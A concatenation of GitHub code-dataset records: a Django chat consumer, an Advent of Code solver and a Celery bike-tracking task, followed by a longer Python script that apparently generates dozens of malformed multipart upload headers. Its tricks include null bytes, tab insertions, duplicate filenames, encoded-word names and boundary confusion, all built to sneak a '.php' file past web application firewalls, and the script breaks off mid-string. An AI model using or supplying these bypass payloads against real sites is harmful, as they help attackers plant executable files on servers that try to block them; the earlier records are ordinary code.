solve()","repo_name":"shg9411/algo","sub_path":"algo_py/boj/bj4195.py","file_name":"bj4195.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"14285225073","text":"import json\nimport time\nfrom channels.generic.websocket import AsyncWebsocketConsumer\nfrom asgiref.sync import sync_to_async\n#from users.models import userModel\nfrom .models import Message\n\n\nclass chatConsumer(AsyncWebsocketConsumer):\n async def connect(self):\n self.room_name = self.scope['url_route']['kwargs'].get(\n 'room_name', '0')\n self.room_group_name = f'chat_{self.room_name}'\n # join room group\n await self.channel_layer.group_add(self.room_group_name,\n self.channel_name)\n\n await self.accept()\n\n async def disconnect(self, close_mode):\n # leave room group\n await self.channel_layer.group_discard(self.room_group_name,\n self.channel_name)\n\n async def receive(self, text_data):\n \"\"\"receive message from websocket\"\"\"\n text_data_json = json.loads(text_data)\n message = text_data_json['message']\n await self.save_message(self.room_name, message)\n # send message to the group\n await self.channel_layer.group_send(\n self.room_group_name, {\n 'type': 'chat_message',\n 'message': message,\n 'sender': self.scope['user'].username,\n })\n\n async def chat_message(self, event):\n \"\"\"receive message from room group\"\"\"\n message = event['message']\n sender = event['sender']\n # send message to websocket\n await self.send(text_data=json.dumps(\n {\n 'message': message,\n 'sender': sender,\n 'sendtime': time.strftime('%Y-%m-%d %H:%M:%S',\n time.localtime()),\n }))\n\n @sync_to_async\n def save_message(self, room, content):\n user = self.scope['user']\n\n Message.objects.create(sender=user.username,\n room=room,\n message=content)\n","repo_name":"herschel-ma/BlogApp","sub_path":"chat/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23385834009","text":"# https://adventofcode.com/2022/day/2\n\nfrom enum import Enum\n\n\nEXAMPLE_INPUT = \"\"\"\\\nA Y\nB X\nC Z\n\"\"\"\n\n\n# === Part 1 ===\n\n\nclass Shape(Enum):\n ROCK = 1\n PAPER = 2\n SCISSORS = 3\n\n\nclass Outcome(Enum):\n LOSE = 0\n DRAW = 3\n WIN = 6\n\n\ndef test_part1():\n assert part1(EXAMPLE_INPUT) == 15\n\n\ndef part1(text):\n return sum(line_score_part1(line) for line in 
text.splitlines())\n\n\nTHEIR_SHAPES = {\n \"A\": Shape.ROCK,\n \"B\": Shape.PAPER,\n \"C\": Shape.SCISSORS,\n}\n\nMY_SHAPES = {\n \"X\": Shape.ROCK,\n \"Y\": Shape.PAPER,\n \"Z\": Shape.SCISSORS,\n}\n\nBEATS = {\n Shape.ROCK: Shape.SCISSORS,\n Shape.SCISSORS: Shape.PAPER,\n Shape.PAPER: Shape.ROCK,\n}\n\nLOSES_TO = {value: key for key, value in BEATS.items()}\n\n\ndef line_score_part1(line):\n their_move, my_move = line.split()\n return round_score(THEIR_SHAPES[their_move], MY_SHAPES[my_move])\n\n\ndef round_score(their_shape, my_shape):\n return my_shape.value + outcome(my_shape, their_shape).value\n\n\ndef outcome(my_shape, their_shape):\n if BEATS[my_shape] == their_shape:\n return Outcome.WIN\n if BEATS[their_shape] == my_shape:\n return Outcome.LOSE\n return Outcome.DRAW\n\n\n# === Part 2 ===\n\n\ndef test_part2():\n assert part2(EXAMPLE_INPUT) == 12\n\n\ndef part2(text):\n return sum(line_score_part2(line) for line in text.splitlines())\n\n\ndef line_score_part2(line):\n their_move, desired_outcome = line.split()\n their_shape = THEIR_SHAPES[their_move]\n my_shape = shape_to_play(their_shape, desired_outcome)\n return round_score(their_shape, my_shape)\n\n\ndef shape_to_play(their_shape, desired_outcome):\n if desired_outcome == \"X\": # lose\n return BEATS[their_shape]\n if desired_outcome == \"Y\": # draw\n return their_shape\n if desired_outcome == \"Z\": # win\n return LOSES_TO[their_shape]\n\n\ndef read_puzzle_input():\n with open(__file__.removesuffix(\"py\") + \"txt\") as f:\n return f.read()\n\n\nif __name__ == \"__main__\":\n text = read_puzzle_input()\n print(\"Part 1:\", part1(text))\n print(\"Part 2:\", part2(text))\n","repo_name":"ronnix/jeux-de-programmation","sub_path":"07-advent-of-code-2022/day-02.py","file_name":"day-02.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"15536685703","text":"from .models import Edge, Bike\nfrom celery import shared_task\nfrom channels.layers import get_channel_layer\nfrom asgiref.sync import async_to_sync\nfrom .utils import Red\nfrom django.core.exceptions import ObjectDoesNotExist\n\nimport json\nfrom decimal import Decimal\n\ndef default(obj):\n if isinstance(obj, Decimal):\n return str(obj)\n raise TypeError(\"Object of type '%s' is not JSON serializable\" % type(obj).__name__)\n\nchannel_layer = get_channel_layer()\n\n\n@shared_task\ndef send_location():\n data = []\n for item in Red.getAllKey():\n if item.isnumeric():\n edge = Red.get(item)\n edge = json.loads(edge)\n edge['id'] = item\n rent = Red.get('rented')\n if rent is None:\n edge['mode'] = False\n else:\n rent = json.loads(rent)\n print(rent, type(rent))\n if item in rent:\n edge['mode'] = rent[item]\n else:\n edge['mode'] = False\n # edge['mode'] = rent[item]\n data.append(edge)\n data = json.dumps(data, default=default)\n\n async_to_sync(channel_layer.group_send)('client', {'type': 'send_new_data', 'text': data })\n\n@shared_task\ndef replicate_redis():\n for item in Red.getAllKey():\n if item.isnumeric():\n try:\n edge = Edge.objects.get(id=int(item))\n data = Red.get(item)\n data = json.loads(data)\n bike = Bike(edge=edge,latitude=float(data[\"latitude\"]), longtitude = float(data[\"longtitude\"]))\n bike.save()\n except ObjectDoesNotExist:\n print(\"edge does not 
exist\")\n\n","repo_name":"dongsinhho/bikeManagerServer","sub_path":"bikeManager/api/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33532333779","text":"import base64, pyperclip\r\n\r\n##https://github.com/maybe-why-not/upload_waf_filename_bypass\r\n##################################################################################################\r\n##Content-Type: multipart/form-data; boundary=------------------------42cef8877054958f\r\n##\r\n##--------------------------42cef8877054958f\r\n##Content-Disposition: form-data; name=\"file\"; filename=\"xx.php\"\r\n##Content-Type: application/png\r\n##\r\n##123456\r\n##--------------------------42cef8877054958f\r\n##################################################################################################\r\nsuffix = b'php'\r\nfilename = b'xx'\r\nname = b'upfile'\r\nboundary = b'------------------------f4c3abc7d7d6bcd9'\r\nContent_Type = b'image/jpeg'\r\ncontent = b'123456'\r\n##################################################################################################\r\ndef generate(Content_Type1 = b'''Content-Type: multipart/form-data; boundary=''' + boundary,\\\r\n boundary1 = b'''--''' + boundary,\\\r\n Content_Disposition = b'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\n Content_Type2 = b'''Content-Type: ''' + Content_Type,\\\r\n body = content,\\\r\n boundary2 = b'''--''' + boundary,\\\r\n ):\r\n \r\n body = Content_Type1 + b'''\\r\r\n\\r\r\n''' + boundary1 + b'''\\r\r\n''' + Content_Disposition + b'''\\r\r\n''' + Content_Type2 + b'''\\r\r\n\\r\r\n''' + body + b'''\\r\r\n''' + boundary2\r\n\r\n return base64.b64encode(body)\r\n\r\ndef generate_other(body = b''):\r\n \r\n return base64.b64encode(body)\r\n\r\ndef utf8_encode(string):\r\n return(b\"=?utf-8?B?\"+ base64.b64encode(string) +b\"?=\")\r\n\r\ndef gbk_encode(string):\r\n res = \"\"\r\n for i in string.decode(\"gbk\"):\r\n tmp = hex(ord(i)).split(\"0x\")[1]\r\n res += f\"={tmp}\"\r\n return (\"=?gbk?Q?\"+res+\"?=\").encode('utf8')\r\n##################################################################################################\r\npayloads = []\r\nContent_Disposition_list = [b'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix[:1] + b'''\\r\\n''' + suffix[1:] + b'''\"''',\r\nb'''\\tContent-Disposition: form-data; name=\"''' + name + b'''\"\\r\\r\\nContent-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition\\t: form-data; name=\"''' + name + b'''\"\\r\\r\\nContent-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\\x00\"\\r\\r\\nContent-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: \"form-data\"; name=\"''' + name + b'''\"; \\x1cfilename\\x1c=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: \"form-data\"; name=\"''' + utf8_encode(name) + b'''\"; filename=\"''' + utf8_encode(filename + b'''.''' + suffix) + b'''\"''',\r\nb'''Content-Disposition: \"form-data\"; name=\"''' + gbk_encode(name) + b'''\"; filename=\"''' + gbk_encode(filename + b'''.''' + suffix) + 
b'''\"''',\r\nb'''Content-Disposition: \"form-data\"; name=\\'''' + name + b'''; filename=\\'''' + filename + b'''.''' + suffix + b'''; name=\\'''' + name + b'''\\'''',\r\nb'''Content-Disposition: \"form-data\"; name=\"''' + name + b'''\\\\\"; filename=\"''' + filename + b'''.''' + suffix + b'''; name=\"''' + name + b'''\"''',\r\nb'''Content-Disposition: \"form-data\"; name=\"''' + name + b'''\"a\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: \"form-data\"; name=\"''' + name + b'''\"; filename=''' + filename + b''''.''' + suffix,\r\nb'''Content-Disposition: \"form-data\"; name=\"''' + name + b'''\"; filename=\"''' + filename + b''''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: \"form-data\"; name=\"''' + name + b'''\"; filename=''' + filename + b'''\".''' + suffix,\r\nb'''Content-Disposition: \"form-data\"; name=\"''' + name + b'''\"; filename=''' + filename + b''':.''' + suffix,\r\nb'''Content-Disposition: \"form-data\"; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''\".''' + suffix + b'''\"''',\r\nb'''Content-Disposition: \"form-data\"; name=''' + name + b'''; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-data; name=''' + name + b'''; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-data; name=''' + name + b'''; filename=''' + filename + b'''.''' + suffix,\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename=''' + filename + b'''.''' + suffix,\r\nb'''Content-Disposition: form-data; name=\\'''' + name + b''''; filename=\\'''' + filename + b'''.''' + suffix + b'''\\'''',\r\nb'''Content-Disposition: 'form-data'; name=\"''' + name + b'''\"; filename=\\'''' + filename + b'''.''' + suffix + b'''\\'''',\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix,\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename=\\'''' + filename + b'''.''' + suffix,\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b''';''',\r\nb'''Content-Disposition: form-data; Name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''content-disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: \"form-data\"; name=\"''' + name + b'''\"; filename=[0x09]\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: \"form-data\"; name=\"''' + name + b'''\"; filename=[0x09]\"''' + filename + b'''.''' + suffix,\r\nb'''Content-Disposition: \"form-data\"; name=\"''' + name + b'''\"; filename=[0x09]\"''' + filename + b'''.''' + suffix + b'''\"[0x09]''',\r\nb'''Content-Disposition: \"form-data\"; name=\"''' + name + b'''\"; filename=[0x09]''' + filename + b'''.''' + suffix,\r\nb'''Content-Disposition: \"form-data\"; name=\"''' + name + b'''\"; filename=[0x09]''' + filename + b'''.''' + suffix + b'''[0x09];''',\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\";;; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-data; name==\"''' + name + b'''\"; filename====\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename===''' + filename + b'''.''' + suffix,\r\nb'''Content-Disposition: fOrM-DaTA; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + 
suffix + b'''\"''',\r\nb'''Content-Disposition: form-da+ta; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: fo r m-dat a; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-datax; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-data; filename=\"''' + filename + b'''.''' + suffix + b'''\"; name=\"''' + name + b'''\"''',\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.jpg\" filename=\"''' + filename + b'''.jpg\"; filename=\"''' + filename + b'''.jpg\"; filename=\"''' + filename + b'''.jpg\"; filename=\"''' + filename + b'''.jpg\"; filename=\"''' + filename + b'''.jpg\"; filename=\"''' + filename + b'''.''' + suffix + b'''\";''',\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\"; fbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf; \\r\\nfilename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.jpg;.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.jpg'.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.jpg\".''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.jpg\\\\.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''[0x00].jpg\"''',\r\nb'''Content-Disposition:form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: *; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: ~form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b''' .jpg\"''',\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''_.jpg\"''',\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''..''' + suffix + b'''.jpg.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\\x00.jpg\"''',\r\nb'''Content-Disposition: form-data; name=\"''' + name + b'''\"; filename=;filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-data+; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-data; 
name=\"''' + name + b'''\"; filename*=\"UTF8\\'''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-data ; name=\"''' + name + b'''\" ; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-data; name= \"''' + name + b'''\"; filename= \"''' + filename + b'''.''' + suffix + b'''\"''',\r\nb'''Content-Disposition: form-data; name=\"test\"; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"''',]\r\n##################################################################################################\r\nContent_Type1_list = [b'''Content-Type: multipart/form-data; boundary=--''' + boundary,\r\nb'''Content-Type: mUltiPart/ForM-dATa; boundary=--''' + boundary,\r\nb'''Content-Type: multipart/form-data boundary=--''' + boundary,\r\nb'''Content-Type: multipart/form-data x boundary=--''' + boundary,\r\nb'''Content-Type: multipart/form-data a\\\\|/?!@#$%^() boundary=--''' + boundary,\r\nb'''Content-Type: multipart/form-data,boundary=--''' + boundary,\r\nb'''Content-Type: multipart/form-data,x,boundary=--''' + boundary,\r\nb'''Content-Type: multipart/form-data,a\\\\|/?!@#$%^(),boundary=--''' + boundary,\r\nb'''Content-Type: multipart/form-data;bypass&123**{|}boundary=--''' + boundary,\r\nb'''Content-Type: multipart/form-data bypass&123**{|}boundary=--''' + boundary,\r\nb'''Content-Type: multipart/form-data,bypass&123**{|}boundary=--''' + boundary,\r\nb'''Content-Type: multipart/form-data; boundary=--''' + boundary + b''';123abc''',\r\nb'''Content-Type: multipart/form-data; boundary=--''' + boundary + b''',123abc''',\r\nb'''Content-Type: multipart/form-data; boundary =--''' + boundary,\r\nb'''Content-Type: multipart/form-data ; boundary=--''' + boundary,\r\nb'''Content-Type: multipart/form-data; bOundary=--''' + boundary,]\r\n##################################################################################################\r\nContent_Type2_list = [b'''content-type: ''' + Content_Type,\r\nb'''Content-Type: ''' + Content_Type,]\r\n##################################################################################################\r\nother_list = [b'''Content-Type: multipart/form-data; boundary=''' + boundary + b'''\\r\r\n\\r\r\n--''' + boundary + b'''\\r\r\nContent-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.jpg\"\\r\r\nContent-Type: ''' + Content_Type + b'''\\r\r\n\\r\r\n''' + content + b'''\\r\r\n--''' + boundary + b'''\\r\r\nContent-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"\\r\r\nContent-Type: ''' + Content_Type + b'''\\r\r\n\\r\r\n''' + content + b'''\\r\r\n--''' + boundary,#\r\nb'''Content-Type: multipart/form-data; boundary=''' + boundary + b'''\\r\r\n\\r\r\n--''' + boundary + b'''\\r\r\n--''' + boundary + b'''--\\r\r\n--''' + boundary + b''';123\\r\r\n--''' + boundary + b'''\\r\r\nContent-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"\\r\r\nContent-Type: ''' + Content_Type + b'''\\r\r\n\\r\r\n''' + content + b'''\\r\r\n--''' + boundary,#\r\nb'''Content-Type: multipart/form-data; boundary=--''' + boundary + b'''\\r\r\n\\r\r\n--''' + boundary + b'''\\r\r\nContent-Disposition: form-data; name=\"''' + name + b'''\"; 
fbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf; \\r\r\nfilename=\"''' + filename + b'''.''' + suffix + b'''\"\\r\r\nContent-Type: ''' + Content_Type + b'''\\r\r\n\\r\r\n''' + content + b'''\\r\r\n--''' + boundary,#\r\nb'''Content-Type: multipart/form-data; boundary=--''' + boundary + b'''fbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bfWebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9\\r\r\n\\r\r\n--''' + boundary + b'''fbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bfWebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9\\r\r\nContent-Disposition: form-data; name=\"''' + name + b'''\";filename=\"''' + filename + b'''.''' + suffix + b'''\"\\r\r\nContent-Type: ''' + Content_Type + b'''\\r\r\n\\r\r\n''' + content + b'''\\r\r\n--''' + boundary + b'''fbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bfWebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9''',#\r\nb'''Content-Type: multipart/form-data; boundary=--''' + boundary + 
b''',bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bfWebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9\\r\r\n\\r\r\n--''' + boundary + b'''\\r\r\nContent-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"\\r\r\nContent-Type: ''' + Content_Type + b'''\\r\r\n\\r\r\n''' + content + b'''\\r\r\n--''' + boundary,#\r\nb'''Content-Type: multipart/form-data bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bfWebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9boundary=--''' + boundary + b'''\\r\r\n\\r\r\n--''' + boundary + b'''\\r\r\nContent-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"\\r\r\nContent-Type: ''' + Content_Type + b'''\\r\r\n\\r\r\n''' + content + b'''\\r\r\n--''' + boundary,#\r\nb'''Content-Type: multipart/form-data; boundary=''' + boundary + b'''\\r\r\n\\r\r\n--''' + boundary + b'''\\r\r\nContent-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"\\r\r\n\\r\r\n\\r\r\n''' + content + b'''\\r\r\n--''' + boundary,#\r\nb'''Content-Type: multipart/form-data; boundary=\"\"''' + boundary + b'''\"\\r\r\n\\r\r\n--\\r\r\nContent-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"\\r\r\nContent-Type: ''' + Content_Type + b'''\\r\r\n\\r\r\n''' + content + b'''\\r\r\n--\"\"''' + boundary + b'''\"''',#\r\nb'''Content-Type: multipart/form-data; boundary= \"''' + boundary + b'''\" \\r\r\n\\r\r\n-- \"''' + boundary + b'''\"\\r\r\nContent-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"\\r\r\nContent-Type: ''' + Content_Type + b'''\\r\r\n\\r\r\n''' + content + b'''\\r\r\n-- \"''' + boundary + b'''\"''',#\r\nb'''Content-Type : multipart/form-data; boundary=--b\\r\r\nContent-Type: multipart/form-data; boundary=''' + boundary + b'''\\r\r\n\\r\r\n--b\\r\r\nContent-Disposition: form-data; name=\"''' + name + b'''\";\\r\r\nContent-Type: ''' + Content_Type + b'''\\r\r\n\\r\r\n1\\r\r\n--''' + boundary + b'''\\r\r\nContent-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"\\r\r\nContent-Type: ''' + Content_Type + b'''\\r\r\n\\r\r\n''' + content + b'''\\r\r\n--''' + boundary + b'''--\\r\r\n--b''',#\r\nb'''Content-Type: multipart/form-data; aboundary=''' + boundary + b''';boundary=b;\\r\r\n\\r\r\n--b\\r\r\nContent-Disposition: form-data; name=\"''' + name + b'''\";\\r\r\nContent-Type: ''' + Content_Type + b'''\\r\r\n\\r\r\n1\\r\r\n--''' + boundary + b'''\\r\r\nContent-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"\\r\r\nContent-Type: ''' + Content_Type + b'''\\r\r\n\\r\r\n''' + content + b'''\\r\r\n--''' + boundary + b'''--\\r\r\n--b''',#\r\nb'''Content-Type: 
